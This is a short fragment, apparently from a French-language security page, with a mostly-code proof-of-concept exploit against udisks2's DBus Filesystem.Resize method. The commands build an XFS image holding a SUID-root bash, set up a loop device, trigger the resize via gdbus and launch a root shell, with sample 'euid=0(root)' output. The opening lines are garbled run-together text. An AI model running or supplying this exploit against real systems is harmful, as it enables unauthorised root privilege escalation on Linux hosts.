
exploit
udisks2udisks2 (interface DBus)org.freedesktop.UDisks2.Filesystem.Resize/tmp/blockdev*dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash # Définir le bit SUID
umount ./xfs.mount
# Vérifier les capacités du système
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Supprimer les interférences
killall -KILL gvfs-udisks2-volume-monitor
# Configurer le périphérique loop
udisksctl loop-setup --file ./xfs.image --no-user-interaction
# Observateur en arrière-plan (s'exécute lorsque le binaire SUID apparaît)
while true; do
/tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &
# Déclencher la vulnérabilité via DBus
gdbus call --system --dest org.freedesktop.UDisks2 \
--object-path /org/freedesktop/UDisks2/block_devices/loop0 \
--method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
/tmp/blockdev*/bash -p # Lancer un shell privilégié
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)
L'exploit ne fonctionne que dans une session logind !
udisksctl loop-setup --no-user-interaction est refusé par polkit, donc la preuve de concept échoue avec « Failed to create loop device ».Remarque :
$ sudo bash exploit.sh create
$ bash exploit.sh exploit
